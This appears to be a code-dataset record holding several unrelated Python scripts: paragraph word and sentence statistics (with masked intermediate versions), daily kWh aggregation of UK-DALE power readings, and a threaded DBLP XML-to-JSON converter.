avgSentLen_chars = round(totSentWithPunctuation / len(paragraph),2)
#Validate output by printing a test line
# print(f"words: {len(words)} S w Punct. len: {len(sentWithPunctuation)} Sentence: {sentWithPunctuation}")
print(f"\n\nParagraph Analysis of '{sourceFile}' file")
print(f"---------------------------------------------------------")
print(f" Approximate Word Count: {totWords} ")
print(f" Approximate Sentence Count: {len(paragraph)} ")
print(f" Average Letter Count: {avgLetterCount} ")
print(f" Average Sentence Length (words): {avgSentLen_Words} ")
print(f" Average Sentence Length (chars): {avgSentLen_chars} ")
|
normal
|
{
"blob_id": "3cd7abf9659fe1db0ef3aa58df8dd7fd959e10a6",
"index": 386,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open(sourceFile, 'r') as paragraph:\n paragraph = paragraph.read().split('\\n\\n')\nfor sentence in paragraph:\n sentWithPunctuation = sentence\n sentNoPunctuation = re.sub('[^\\\\w\\\\s]', '', sentence)\n words = sentNoPunctuation.split(' ')\n for word in words:\n wordLen = wordLen + len(word)\n totWords = totWords + len(words)\n avgSentLen_Words = round(totWords / len(paragraph), 2)\n avgLetterCount = round(wordLen / totWords, 2)\n totSentWithPunctuation = totSentWithPunctuation + len(sentWithPunctuation)\n avgSentLen_chars = round(totSentWithPunctuation / len(paragraph), 2)\nprint(f\"\"\"\n\nParagraph Analysis of '{sourceFile}' file\"\"\")\nprint(f'---------------------------------------------------------')\nprint(f' Approximate Word Count: {totWords} ')\nprint(f' Approximate Sentence Count: {len(paragraph)} ')\nprint(f' Average Letter Count: {avgLetterCount} ')\nprint(f' Average Sentence Length (words): {avgSentLen_Words} ')\nprint(f' Average Sentence Length (chars): {avgSentLen_chars} ')\n",
"step-3": "<mask token>\ntotWords = 0\nwordLen = 0\ntotSentWithPunctuation = 0\nsourceFile = os.path.join('Resources', 'paragraph_2.txt')\nwith open(sourceFile, 'r') as paragraph:\n paragraph = paragraph.read().split('\\n\\n')\nfor sentence in paragraph:\n sentWithPunctuation = sentence\n sentNoPunctuation = re.sub('[^\\\\w\\\\s]', '', sentence)\n words = sentNoPunctuation.split(' ')\n for word in words:\n wordLen = wordLen + len(word)\n totWords = totWords + len(words)\n avgSentLen_Words = round(totWords / len(paragraph), 2)\n avgLetterCount = round(wordLen / totWords, 2)\n totSentWithPunctuation = totSentWithPunctuation + len(sentWithPunctuation)\n avgSentLen_chars = round(totSentWithPunctuation / len(paragraph), 2)\nprint(f\"\"\"\n\nParagraph Analysis of '{sourceFile}' file\"\"\")\nprint(f'---------------------------------------------------------')\nprint(f' Approximate Word Count: {totWords} ')\nprint(f' Approximate Sentence Count: {len(paragraph)} ')\nprint(f' Average Letter Count: {avgLetterCount} ')\nprint(f' Average Sentence Length (words): {avgSentLen_Words} ')\nprint(f' Average Sentence Length (chars): {avgSentLen_chars} ')\n",
"step-4": "import os\nimport csv\nimport re\ntotWords = 0\nwordLen = 0\ntotSentWithPunctuation = 0\nsourceFile = os.path.join('Resources', 'paragraph_2.txt')\nwith open(sourceFile, 'r') as paragraph:\n paragraph = paragraph.read().split('\\n\\n')\nfor sentence in paragraph:\n sentWithPunctuation = sentence\n sentNoPunctuation = re.sub('[^\\\\w\\\\s]', '', sentence)\n words = sentNoPunctuation.split(' ')\n for word in words:\n wordLen = wordLen + len(word)\n totWords = totWords + len(words)\n avgSentLen_Words = round(totWords / len(paragraph), 2)\n avgLetterCount = round(wordLen / totWords, 2)\n totSentWithPunctuation = totSentWithPunctuation + len(sentWithPunctuation)\n avgSentLen_chars = round(totSentWithPunctuation / len(paragraph), 2)\nprint(f\"\"\"\n\nParagraph Analysis of '{sourceFile}' file\"\"\")\nprint(f'---------------------------------------------------------')\nprint(f' Approximate Word Count: {totWords} ')\nprint(f' Approximate Sentence Count: {len(paragraph)} ')\nprint(f' Average Letter Count: {avgLetterCount} ')\nprint(f' Average Sentence Length (words): {avgSentLen_Words} ')\nprint(f' Average Sentence Length (chars): {avgSentLen_chars} ')\n",
"step-5": "import os\nimport csv\nimport re\n\ntotWords = 0\nwordLen = 0\ntotSentWithPunctuation = 0\n\nsourceFile = os.path.join('Resources', 'paragraph_2.txt')\n\nwith open(sourceFile, 'r') as paragraph:\n paragraph = paragraph.read().split(\"\\n\\n\")\n\n\nfor sentence in paragraph:\n # Remove punctuation from sentences\n sentWithPunctuation = sentence\n sentNoPunctuation = re.sub(r'[^\\w\\s]','',sentence)\n\n #Split sentence with no punctuation by words using spaces\n words = sentNoPunctuation.split(\" \")\n for word in words:\n wordLen = wordLen + len(word)\n\n # Compute totals for output message \n totWords = totWords + len(words) # Total words for all sentences\n avgSentLen_Words = round(totWords / len(paragraph),2) # Average words for all sentences\n avgLetterCount = round(wordLen/totWords,2) # Average letter by word for all sentences\n totSentWithPunctuation = totSentWithPunctuation + len(sentWithPunctuation)\n avgSentLen_chars = round(totSentWithPunctuation / len(paragraph),2)\n\n #Validate output by printing a test line\n # print(f\"words: {len(words)} S w Punct. len: {len(sentWithPunctuation)} Sentence: {sentWithPunctuation}\")\n\nprint(f\"\\n\\nParagraph Analysis of '{sourceFile}' file\")\nprint(f\"---------------------------------------------------------\")\nprint(f\" Approximate Word Count: {totWords} \")\nprint(f\" Approximate Sentence Count: {len(paragraph)} \")\nprint(f\" Average Letter Count: {avgLetterCount} \")\nprint(f\" Average Sentence Length (words): {avgSentLen_Words} \")\nprint(f\" Average Sentence Length (chars): {avgSentLen_chars} \")\n\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import pandas as pd
import numpy as np
import matplotlib.pylab as plt
from matplotlib.pylab import rcParams
#from pandas import datetime
#from pandas.tseries.t
from sklearn.preprocessing import MinMaxScaler
#from statsmodels.tsa.seasonal import seasonal_decompose
from pandas import Series
data = pd.read_csv(
r'E:\Thesis Content\ukdale\house_1\channel_7.dat',
delimiter=' ',
header=None,
names=['date', 'KWh'],
dtype={'date': np.int64, 'KWh': np.float64},
index_col='date'
) #initially KWh column contains Ws in 6 second interval, later it will be converted to KWh
data.index = pd.to_datetime((data.index.values), unit='s')
#data.head(5)
#before_process = data
after_process=data
#before_process = before_process.resample('d').sum()
#before_process['KWh'] = round(((before_process.KWh * 6) / (1000 * 3600)) , 3)
#before_process.head(5)
after_process = after_process.drop(after_process[(after_process.KWh < 10) | (after_process.KWh > 4000) ].index)
after_process = after_process.resample('d').sum()
#after_process.head(5)
after_process['KWh'] = round(((after_process.KWh * 6) / (1000 * 3600)) , 3)
after_process.head(5)
after_process.to_csv(path_or_buf=r'E:\Thesis Content\ukdale CSV\Without Noise\Tvday.csv', sep = ',' , index_label = 'date')
#rcParams['figure.figsize'] = 16, 10
#plt.subplot(2, 1, 1)
#plt.scatter(before_process.index ,before_process['KWh'].values, s=10)
#plt.title('Before and After Pre Processing')
#plt.ylabel('KWh')
#plt.subplot(2, 1, 2)
#plt.scatter(after_process.index ,after_process['KWh'].values, s=10)
#plt.xlabel('Date')
#plt.ylabel('KWh')
#plt.show()
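
# A minimal sketch of the unit conversion above as a reusable helper: each raw
# sample is instantaneous power in watts taken every 6 seconds, so a sample
# contributes (W * 6) watt-seconds, and dividing the daily sum by 1000 * 3600
# converts it to kWh. The 6-second spacing and column meaning are the same
# assumptions the script above makes.
def watts_to_daily_kwh(watt_series, sample_seconds=6):
    energy_ws = watt_series * sample_seconds            # watt-seconds per sample
    daily_kwh = energy_ws.resample('D').sum() / (1000 * 3600)
    return daily_kwh.round(3)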
|
normal
|
{
"blob_id": "19c0c3156488ce99316ce40f32e84e476b7afdac",
"index": 2754,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nafter_process.head(5)\nafter_process.to_csv(path_or_buf=\n 'E:\\\\Thesis Content\\\\ukdale CSV\\\\Without Noise\\\\Tvday.csv', sep=',',\n index_label='date')\n",
"step-3": "<mask token>\ndata = pd.read_csv('E:\\\\Thesis Content\\\\ukdale\\\\house_1\\\\channel_7.dat',\n delimiter=' ', header=None, names=['date', 'KWh'], dtype={'date': np.\n int64, 'KWh': np.float64}, index_col='date')\ndata.index = pd.to_datetime(data.index.values, unit='s')\nafter_process = data\nafter_process = after_process.drop(after_process[(after_process.KWh < 10) |\n (after_process.KWh > 4000)].index)\nafter_process = after_process.resample('d').sum()\nafter_process['KWh'] = round(after_process.KWh * 6 / (1000 * 3600), 3)\nafter_process.head(5)\nafter_process.to_csv(path_or_buf=\n 'E:\\\\Thesis Content\\\\ukdale CSV\\\\Without Noise\\\\Tvday.csv', sep=',',\n index_label='date')\n",
"step-4": "import pandas as pd\nimport numpy as np\nimport matplotlib.pylab as plt\nfrom matplotlib.pylab import rcParams\nfrom sklearn.preprocessing import MinMaxScaler\nfrom pandas import Series\ndata = pd.read_csv('E:\\\\Thesis Content\\\\ukdale\\\\house_1\\\\channel_7.dat',\n delimiter=' ', header=None, names=['date', 'KWh'], dtype={'date': np.\n int64, 'KWh': np.float64}, index_col='date')\ndata.index = pd.to_datetime(data.index.values, unit='s')\nafter_process = data\nafter_process = after_process.drop(after_process[(after_process.KWh < 10) |\n (after_process.KWh > 4000)].index)\nafter_process = after_process.resample('d').sum()\nafter_process['KWh'] = round(after_process.KWh * 6 / (1000 * 3600), 3)\nafter_process.head(5)\nafter_process.to_csv(path_or_buf=\n 'E:\\\\Thesis Content\\\\ukdale CSV\\\\Without Noise\\\\Tvday.csv', sep=',',\n index_label='date')\n",
"step-5": "import pandas as pd\nimport numpy as np\nimport matplotlib.pylab as plt\nfrom matplotlib.pylab import rcParams\n#from pandas import datetime\n#from pandas.tseries.t\nfrom sklearn.preprocessing import MinMaxScaler\n#from statsmodels.tsa.seasonal import seasonal_decompose\nfrom pandas import Series\n\ndata = pd.read_csv(\n r'E:\\Thesis Content\\ukdale\\house_1\\channel_7.dat',\n delimiter=' ',\n header=None,\n names=['date', 'KWh'],\n dtype={'date': np.int64, 'KWh': np.float64},\n index_col='date'\n ) #initially KWh column contains Ws in 6 second interval, later it will be converted to KWh\n\ndata.index = pd.to_datetime((data.index.values), unit='s')\n#data.head(5)\n#before_process = data\nafter_process=data\n#before_process = before_process.resample('d').sum()\n#before_process['KWh'] = round(((before_process.KWh * 6) / (1000 * 3600)) , 3)\n#before_process.head(5)\nafter_process = after_process.drop(after_process[(after_process.KWh < 10) | (after_process.KWh > 4000) ].index)\nafter_process = after_process.resample('d').sum()\n#after_process.head(5)\nafter_process['KWh'] = round(((after_process.KWh * 6) / (1000 * 3600)) , 3)\nafter_process.head(5)\n\nafter_process.to_csv(path_or_buf=r'E:\\Thesis Content\\ukdale CSV\\Without Noise\\Tvday.csv', sep = ',' , index_label = 'date')\n\n\n#rcParams['figure.figsize'] = 16, 10\n#plt.subplot(2, 1, 1)\n#plt.scatter(before_process.index ,before_process['KWh'].values, s=10)\n#plt.title('Before and After Pre Processing')\n#plt.ylabel('KWh')\n#plt.subplot(2, 1, 2)\n#plt.scatter(after_process.index ,after_process['KWh'].values, s=10)\n#plt.xlabel('Date')\n#plt.ylabel('KWh')\n#plt.show()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import xml.etree.ElementTree as ET
from collections import OrderedDict
import json
import threading
class MyThread(threading.Thread):
def __init__(self, filenum):
threading.Thread.__init__(self)
self.filenum = filenum
        print('Starting thread:', str(self.filenum))
def run(self):
parser = ET.XMLParser(encoding='ISO-8859-1')
parser.entity["agrave"] = 'à'
parser.entity["uuml"] = 'ü'
parser.entity["Eacute"] = 'É'
parser.entity["eacute"] = 'é'
parser.entity["aacute"] = 'á'
parser.entity["iacute"] = 'í'
parser.entity["ouml"] = 'ö'
parser.entity["ccedil"] = 'ç'
parser.entity["egrave"] = 'è'
parser.entity["auml"] = 'ä'
parser.entity["uacute"] = 'ú'
parser.entity["aring"] = 'å'
parser.entity["oacute"] = 'ó'
parser.entity["szlig"] = 'ß'
parser.entity["oslash"] = 'ø'
parser.entity["yacute"] = 'ỳ'
parser.entity["iuml"] = 'ï'
parser.entity["igrave"] = 'í'
parser.entity["ocirc"] = 'ô'
parser.entity["icirc"] = 'î'
parser.entity["Uuml"] = 'Ü'
parser.entity["euml"] = 'ë'
parser.entity["acirc"] = 'â'
parser.entity["atilde"] = 'ã'
parser.entity["Uacute"] = 'Ù'
parser.entity["Aacute"] = 'À'
parser.entity["ntilde"] = 'ñ'
parser.entity["Auml"] = 'Ä'
parser.entity["Oslash"] = 'Ø'
parser.entity["Ccedil"] = 'Ç'
parser.entity["otilde"] = 'õ'
parser.entity["ecirc"] = 'ê'
parser.entity["times"] = '×'
parser.entity["Ouml"] = 'Ö'
parser.entity["reg"] = '®'
parser.entity["Aring"] = 'Å'
parser.entity["Oacute"] = 'Ò'
parser.entity["ograve"] = 'ó'
parser.entity["yuml"] = 'ÿ'
parser.entity["eth"] = 'ð'
parser.entity["aelig"] = 'æ'
parser.entity["AElig"] = 'Æ'
parser.entity["Agrave"] = 'Á'
parser.entity["Iuml"] = 'Ï'
parser.entity["micro"] = 'µ'
parser.entity["Acirc"] = 'Â'
parser.entity["Otilde"] = 'Õ'
parser.entity["Egrave"] = 'É'
parser.entity["ETH"] = 'Ð'
parser.entity["ugrave"] = 'ú'
parser.entity["ucirc"] = 'û'
parser.entity["thorn"] = 'þ'
parser.entity["THORN"] = 'Þ'
parser.entity["Iacute"] = 'Ì'
parser.entity["Icirc"] = 'Î'
parser.entity["Ntilde"] = 'Ñ'
parser.entity["Ecirc"] = 'Ê'
parser.entity["Ocirc"] = 'Ô'
parser.entity["Ograve"] = 'Ó'
parser.entity["Igrave"] = 'Í'
parser.entity["Atilde"] = 'Ã'
parser.entity["Yacute"] = 'Ỳ'
parser.entity["Ucirc"] = 'Û'
parser.entity["Euml"] = 'Ë'
xml_file = '../../../data/dblp.' + str(self.filenum) + '.xml'
e = ET.parse(xml_file, parser=parser).getroot()
tot_docs = len(e)
doc_number = 0
mitad = False
max_mitad = False
complete = False
d = OrderedDict()
docs = ['article', 'inproceedings', 'incollection']
tags = ['author', 'year', 'title']
        # Open the results file; mode 'w' truncates any previous results, and the
        # handle must stay open because the loop below writes one JSON line per
        # document (it is closed explicitly after the loop).
        out = open('../../../data/result' + str(self.filenum) + '.txt', 'w')
        # Store each record in a dict and dump it as one JSON line
for child1 in e:
            if ((doc_number / tot_docs > 0.5) & (not mitad)):
                print('50% of the documents processed in thread', str(self.filenum))
                mitad = True
            if ((doc_number / tot_docs > 0.9) & (not max_mitad)):
                print('90% of the documents processed in thread', str(self.filenum))
                max_mitad = True
            if ((doc_number / tot_docs == 1.0) & (not complete)):
                print('100% of the documents processed in thread', str(self.filenum))
                complete = True
if (child1.tag in docs):
d['Type'] = child1.tag
d['Authors'] = []
for child2 in child1:
if (child2.tag in tags):
if (child2.tag == 'author'):
dicc_aut = dict()
dicc_aut["Nombre"] = child2.text
d['Authors'].append(dicc_aut)
elif child2.tag == "title":
d["Title"] = child2.text
elif child2.tag == "year":
d["Year"] = child2.text
out.writelines(json.dumps(d) + '\n')
doc_number += 1
out.close()
for i in range(7):
MyThread(i).start()
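
# The long block of parser.entity assignments in run() can be generated from
# the standard library's Latin-1 entity table instead of being typed by hand.
# A minimal sketch, assuming html.entities covers the entity names that the
# DBLP dump actually uses:
from html.entities import entitydefs  # e.g. 'agrave' -> 'à', 'Uuml' -> 'Ü'


def make_dblp_parser():
    parser = ET.XMLParser(encoding='ISO-8859-1')
    for name, char in entitydefs.items():
        parser.entity[name] = char
    return parser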
|
normal
|
{
"blob_id": "9150eb53d309e75299775cd9524a688e8dc2ff76",
"index": 4210,
"step-1": "<mask token>\n\n\nclass MyThread(threading.Thread):\n\n def __init__(self, filenum):\n threading.Thread.__init__(self)\n self.filenum = filenum\n print('Inicio del thread:', str(self.filenum))\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MyThread(threading.Thread):\n\n def __init__(self, filenum):\n threading.Thread.__init__(self)\n self.filenum = filenum\n print('Inicio del thread:', str(self.filenum))\n\n def run(self):\n parser = ET.XMLParser(encoding='ISO-8859-1')\n parser.entity['agrave'] = 'à'\n parser.entity['uuml'] = 'ü'\n parser.entity['Eacute'] = 'É'\n parser.entity['eacute'] = 'é'\n parser.entity['aacute'] = 'á'\n parser.entity['iacute'] = 'í'\n parser.entity['ouml'] = 'ö'\n parser.entity['ccedil'] = 'ç'\n parser.entity['egrave'] = 'è'\n parser.entity['auml'] = 'ä'\n parser.entity['uacute'] = 'ú'\n parser.entity['aring'] = 'å'\n parser.entity['oacute'] = 'ó'\n parser.entity['szlig'] = 'ß'\n parser.entity['oslash'] = 'ø'\n parser.entity['yacute'] = 'ỳ'\n parser.entity['iuml'] = 'ï'\n parser.entity['igrave'] = 'í'\n parser.entity['ocirc'] = 'ô'\n parser.entity['icirc'] = 'î'\n parser.entity['Uuml'] = 'Ü'\n parser.entity['euml'] = 'ë'\n parser.entity['acirc'] = 'â'\n parser.entity['atilde'] = 'ã'\n parser.entity['Uacute'] = 'Ù'\n parser.entity['Aacute'] = 'À'\n parser.entity['ntilde'] = 'ñ'\n parser.entity['Auml'] = 'Ä'\n parser.entity['Oslash'] = 'Ø'\n parser.entity['Ccedil'] = 'Ç'\n parser.entity['otilde'] = 'õ'\n parser.entity['ecirc'] = 'ê'\n parser.entity['times'] = '×'\n parser.entity['Ouml'] = 'Ö'\n parser.entity['reg'] = '®'\n parser.entity['Aring'] = 'Å'\n parser.entity['Oacute'] = 'Ò'\n parser.entity['ograve'] = 'ó'\n parser.entity['yuml'] = 'ÿ'\n parser.entity['eth'] = 'ð'\n parser.entity['aelig'] = 'æ'\n parser.entity['AElig'] = 'Æ'\n parser.entity['Agrave'] = 'Á'\n parser.entity['Iuml'] = 'Ï'\n parser.entity['micro'] = 'µ'\n parser.entity['Acirc'] = 'Â'\n parser.entity['Otilde'] = 'Õ'\n parser.entity['Egrave'] = 'É'\n parser.entity['ETH'] = 'Ð'\n parser.entity['ugrave'] = 'ú'\n parser.entity['ucirc'] = 'û'\n parser.entity['thorn'] = 'þ'\n parser.entity['THORN'] = 'Þ'\n parser.entity['Iacute'] = 'Ì'\n parser.entity['Icirc'] = 'Î'\n parser.entity['Ntilde'] = 'Ñ'\n parser.entity['Ecirc'] = 'Ê'\n parser.entity['Ocirc'] = 'Ô'\n parser.entity['Ograve'] = 'Ó'\n parser.entity['Igrave'] = 'Í'\n parser.entity['Atilde'] = 'Ã'\n parser.entity['Yacute'] = 'Ỳ'\n parser.entity['Ucirc'] = 'Û'\n parser.entity['Euml'] = 'Ë'\n xml_file = '../../../data/dblp.' 
+ str(self.filenum) + '.xml'\n e = ET.parse(xml_file, parser=parser).getroot()\n tot_docs = len(e)\n doc_number = 0\n mitad = False\n max_mitad = False\n complete = False\n d = OrderedDict()\n docs = ['article', 'inproceedings', 'incollection']\n tags = ['author', 'year', 'title']\n with open('../../../data/result' + str(self.filenum) + '.txt', 'w'\n ) as out:\n out.writelines('')\n for child1 in e:\n if (doc_number / tot_docs > 0.5) & (not mitad):\n print('50% de los documentos procesados en el thread',\n str(self.filenum))\n mitad = True\n if (doc_number / tot_docs > 0.9) & (not max_mitad):\n print('90% de los documentos procesados en el thread',\n str(self.filenum))\n max_mitad = True\n if (doc_number / tot_docs == 1.0) & (not complete):\n print('100% de los documentos procesados en el thread',\n str(self.filenum))\n complete = True\n if child1.tag in docs:\n d['Type'] = child1.tag\n d['Authors'] = []\n for child2 in child1:\n if child2.tag in tags:\n if child2.tag == 'author':\n dicc_aut = dict()\n dicc_aut['Nombre'] = child2.text\n d['Authors'].append(dicc_aut)\n elif child2.tag == 'title':\n d['Title'] = child2.text\n elif child2.tag == 'year':\n d['Year'] = child2.text\n out.writelines(json.dumps(d) + '\\n')\n doc_number += 1\n out.close()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass MyThread(threading.Thread):\n\n def __init__(self, filenum):\n threading.Thread.__init__(self)\n self.filenum = filenum\n print('Inicio del thread:', str(self.filenum))\n\n def run(self):\n parser = ET.XMLParser(encoding='ISO-8859-1')\n parser.entity['agrave'] = 'à'\n parser.entity['uuml'] = 'ü'\n parser.entity['Eacute'] = 'É'\n parser.entity['eacute'] = 'é'\n parser.entity['aacute'] = 'á'\n parser.entity['iacute'] = 'í'\n parser.entity['ouml'] = 'ö'\n parser.entity['ccedil'] = 'ç'\n parser.entity['egrave'] = 'è'\n parser.entity['auml'] = 'ä'\n parser.entity['uacute'] = 'ú'\n parser.entity['aring'] = 'å'\n parser.entity['oacute'] = 'ó'\n parser.entity['szlig'] = 'ß'\n parser.entity['oslash'] = 'ø'\n parser.entity['yacute'] = 'ỳ'\n parser.entity['iuml'] = 'ï'\n parser.entity['igrave'] = 'í'\n parser.entity['ocirc'] = 'ô'\n parser.entity['icirc'] = 'î'\n parser.entity['Uuml'] = 'Ü'\n parser.entity['euml'] = 'ë'\n parser.entity['acirc'] = 'â'\n parser.entity['atilde'] = 'ã'\n parser.entity['Uacute'] = 'Ù'\n parser.entity['Aacute'] = 'À'\n parser.entity['ntilde'] = 'ñ'\n parser.entity['Auml'] = 'Ä'\n parser.entity['Oslash'] = 'Ø'\n parser.entity['Ccedil'] = 'Ç'\n parser.entity['otilde'] = 'õ'\n parser.entity['ecirc'] = 'ê'\n parser.entity['times'] = '×'\n parser.entity['Ouml'] = 'Ö'\n parser.entity['reg'] = '®'\n parser.entity['Aring'] = 'Å'\n parser.entity['Oacute'] = 'Ò'\n parser.entity['ograve'] = 'ó'\n parser.entity['yuml'] = 'ÿ'\n parser.entity['eth'] = 'ð'\n parser.entity['aelig'] = 'æ'\n parser.entity['AElig'] = 'Æ'\n parser.entity['Agrave'] = 'Á'\n parser.entity['Iuml'] = 'Ï'\n parser.entity['micro'] = 'µ'\n parser.entity['Acirc'] = 'Â'\n parser.entity['Otilde'] = 'Õ'\n parser.entity['Egrave'] = 'É'\n parser.entity['ETH'] = 'Ð'\n parser.entity['ugrave'] = 'ú'\n parser.entity['ucirc'] = 'û'\n parser.entity['thorn'] = 'þ'\n parser.entity['THORN'] = 'Þ'\n parser.entity['Iacute'] = 'Ì'\n parser.entity['Icirc'] = 'Î'\n parser.entity['Ntilde'] = 'Ñ'\n parser.entity['Ecirc'] = 'Ê'\n parser.entity['Ocirc'] = 'Ô'\n parser.entity['Ograve'] = 'Ó'\n parser.entity['Igrave'] = 'Í'\n parser.entity['Atilde'] = 'Ã'\n parser.entity['Yacute'] = 'Ỳ'\n parser.entity['Ucirc'] = 'Û'\n parser.entity['Euml'] = 'Ë'\n xml_file = '../../../data/dblp.' 
+ str(self.filenum) + '.xml'\n e = ET.parse(xml_file, parser=parser).getroot()\n tot_docs = len(e)\n doc_number = 0\n mitad = False\n max_mitad = False\n complete = False\n d = OrderedDict()\n docs = ['article', 'inproceedings', 'incollection']\n tags = ['author', 'year', 'title']\n with open('../../../data/result' + str(self.filenum) + '.txt', 'w'\n ) as out:\n out.writelines('')\n for child1 in e:\n if (doc_number / tot_docs > 0.5) & (not mitad):\n print('50% de los documentos procesados en el thread',\n str(self.filenum))\n mitad = True\n if (doc_number / tot_docs > 0.9) & (not max_mitad):\n print('90% de los documentos procesados en el thread',\n str(self.filenum))\n max_mitad = True\n if (doc_number / tot_docs == 1.0) & (not complete):\n print('100% de los documentos procesados en el thread',\n str(self.filenum))\n complete = True\n if child1.tag in docs:\n d['Type'] = child1.tag\n d['Authors'] = []\n for child2 in child1:\n if child2.tag in tags:\n if child2.tag == 'author':\n dicc_aut = dict()\n dicc_aut['Nombre'] = child2.text\n d['Authors'].append(dicc_aut)\n elif child2.tag == 'title':\n d['Title'] = child2.text\n elif child2.tag == 'year':\n d['Year'] = child2.text\n out.writelines(json.dumps(d) + '\\n')\n doc_number += 1\n out.close()\n\n\nfor i in range(7):\n MyThread(i).start()\n",
"step-4": "import xml.etree.ElementTree as ET\nfrom collections import OrderedDict\nimport json\nimport threading\n\n\nclass MyThread(threading.Thread):\n\n def __init__(self, filenum):\n threading.Thread.__init__(self)\n self.filenum = filenum\n print('Inicio del thread:', str(self.filenum))\n\n def run(self):\n parser = ET.XMLParser(encoding='ISO-8859-1')\n parser.entity['agrave'] = 'à'\n parser.entity['uuml'] = 'ü'\n parser.entity['Eacute'] = 'É'\n parser.entity['eacute'] = 'é'\n parser.entity['aacute'] = 'á'\n parser.entity['iacute'] = 'í'\n parser.entity['ouml'] = 'ö'\n parser.entity['ccedil'] = 'ç'\n parser.entity['egrave'] = 'è'\n parser.entity['auml'] = 'ä'\n parser.entity['uacute'] = 'ú'\n parser.entity['aring'] = 'å'\n parser.entity['oacute'] = 'ó'\n parser.entity['szlig'] = 'ß'\n parser.entity['oslash'] = 'ø'\n parser.entity['yacute'] = 'ỳ'\n parser.entity['iuml'] = 'ï'\n parser.entity['igrave'] = 'í'\n parser.entity['ocirc'] = 'ô'\n parser.entity['icirc'] = 'î'\n parser.entity['Uuml'] = 'Ü'\n parser.entity['euml'] = 'ë'\n parser.entity['acirc'] = 'â'\n parser.entity['atilde'] = 'ã'\n parser.entity['Uacute'] = 'Ù'\n parser.entity['Aacute'] = 'À'\n parser.entity['ntilde'] = 'ñ'\n parser.entity['Auml'] = 'Ä'\n parser.entity['Oslash'] = 'Ø'\n parser.entity['Ccedil'] = 'Ç'\n parser.entity['otilde'] = 'õ'\n parser.entity['ecirc'] = 'ê'\n parser.entity['times'] = '×'\n parser.entity['Ouml'] = 'Ö'\n parser.entity['reg'] = '®'\n parser.entity['Aring'] = 'Å'\n parser.entity['Oacute'] = 'Ò'\n parser.entity['ograve'] = 'ó'\n parser.entity['yuml'] = 'ÿ'\n parser.entity['eth'] = 'ð'\n parser.entity['aelig'] = 'æ'\n parser.entity['AElig'] = 'Æ'\n parser.entity['Agrave'] = 'Á'\n parser.entity['Iuml'] = 'Ï'\n parser.entity['micro'] = 'µ'\n parser.entity['Acirc'] = 'Â'\n parser.entity['Otilde'] = 'Õ'\n parser.entity['Egrave'] = 'É'\n parser.entity['ETH'] = 'Ð'\n parser.entity['ugrave'] = 'ú'\n parser.entity['ucirc'] = 'û'\n parser.entity['thorn'] = 'þ'\n parser.entity['THORN'] = 'Þ'\n parser.entity['Iacute'] = 'Ì'\n parser.entity['Icirc'] = 'Î'\n parser.entity['Ntilde'] = 'Ñ'\n parser.entity['Ecirc'] = 'Ê'\n parser.entity['Ocirc'] = 'Ô'\n parser.entity['Ograve'] = 'Ó'\n parser.entity['Igrave'] = 'Í'\n parser.entity['Atilde'] = 'Ã'\n parser.entity['Yacute'] = 'Ỳ'\n parser.entity['Ucirc'] = 'Û'\n parser.entity['Euml'] = 'Ë'\n xml_file = '../../../data/dblp.' 
+ str(self.filenum) + '.xml'\n e = ET.parse(xml_file, parser=parser).getroot()\n tot_docs = len(e)\n doc_number = 0\n mitad = False\n max_mitad = False\n complete = False\n d = OrderedDict()\n docs = ['article', 'inproceedings', 'incollection']\n tags = ['author', 'year', 'title']\n with open('../../../data/result' + str(self.filenum) + '.txt', 'w'\n ) as out:\n out.writelines('')\n for child1 in e:\n if (doc_number / tot_docs > 0.5) & (not mitad):\n print('50% de los documentos procesados en el thread',\n str(self.filenum))\n mitad = True\n if (doc_number / tot_docs > 0.9) & (not max_mitad):\n print('90% de los documentos procesados en el thread',\n str(self.filenum))\n max_mitad = True\n if (doc_number / tot_docs == 1.0) & (not complete):\n print('100% de los documentos procesados en el thread',\n str(self.filenum))\n complete = True\n if child1.tag in docs:\n d['Type'] = child1.tag\n d['Authors'] = []\n for child2 in child1:\n if child2.tag in tags:\n if child2.tag == 'author':\n dicc_aut = dict()\n dicc_aut['Nombre'] = child2.text\n d['Authors'].append(dicc_aut)\n elif child2.tag == 'title':\n d['Title'] = child2.text\n elif child2.tag == 'year':\n d['Year'] = child2.text\n out.writelines(json.dumps(d) + '\\n')\n doc_number += 1\n out.close()\n\n\nfor i in range(7):\n MyThread(i).start()\n",
"step-5": "import xml.etree.ElementTree as ET\nfrom collections import OrderedDict\nimport json\nimport threading\n\nclass MyThread(threading.Thread):\n def __init__(self, filenum):\n threading.Thread.__init__(self)\n self.filenum = filenum\n print('Inicio del thread:', str(self.filenum))\n\n def run(self):\n parser = ET.XMLParser(encoding='ISO-8859-1')\n\n parser.entity[\"agrave\"] = 'à'\n parser.entity[\"uuml\"] = 'ü'\n parser.entity[\"Eacute\"] = 'É'\n parser.entity[\"eacute\"] = 'é'\n parser.entity[\"aacute\"] = 'á'\n parser.entity[\"iacute\"] = 'í'\n parser.entity[\"ouml\"] = 'ö'\n parser.entity[\"ccedil\"] = 'ç'\n parser.entity[\"egrave\"] = 'è'\n parser.entity[\"auml\"] = 'ä'\n parser.entity[\"uacute\"] = 'ú'\n parser.entity[\"aring\"] = 'å'\n parser.entity[\"oacute\"] = 'ó'\n parser.entity[\"szlig\"] = 'ß'\n parser.entity[\"oslash\"] = 'ø'\n parser.entity[\"yacute\"] = 'ỳ'\n parser.entity[\"iuml\"] = 'ï'\n parser.entity[\"igrave\"] = 'í'\n parser.entity[\"ocirc\"] = 'ô'\n parser.entity[\"icirc\"] = 'î'\n parser.entity[\"Uuml\"] = 'Ü'\n parser.entity[\"euml\"] = 'ë'\n parser.entity[\"acirc\"] = 'â'\n parser.entity[\"atilde\"] = 'ã'\n parser.entity[\"Uacute\"] = 'Ù'\n parser.entity[\"Aacute\"] = 'À'\n parser.entity[\"ntilde\"] = 'ñ'\n parser.entity[\"Auml\"] = 'Ä'\n parser.entity[\"Oslash\"] = 'Ø'\n parser.entity[\"Ccedil\"] = 'Ç'\n parser.entity[\"otilde\"] = 'õ'\n parser.entity[\"ecirc\"] = 'ê'\n parser.entity[\"times\"] = '×'\n parser.entity[\"Ouml\"] = 'Ö'\n parser.entity[\"reg\"] = '®'\n 